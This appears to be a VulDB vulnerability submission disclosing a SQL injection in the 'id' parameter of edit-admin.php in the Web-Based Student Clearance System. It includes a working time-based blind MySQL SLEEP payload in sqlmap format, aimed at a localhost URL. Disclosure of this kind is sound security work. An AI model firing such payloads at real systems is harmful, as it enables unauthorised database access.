Title | Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php) |
---|
Description | Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
url:/Admin/edit-admin.php
URI parameter 'id' is vulnerable
Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
payload:
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP
Download Code: https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html |
---|
Source | ⚠️ https://blog.csdn.net/qq_41988749/article/details/127552717?spm=1001.2014.3001.5502 |
---|
User | jinyadong (ID 34634) |
---|
Submission | 10/27/2022 09:17 (2 years ago) |
---|
Moderation | 10/28/2022 07:32 (22 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 212415 |
---|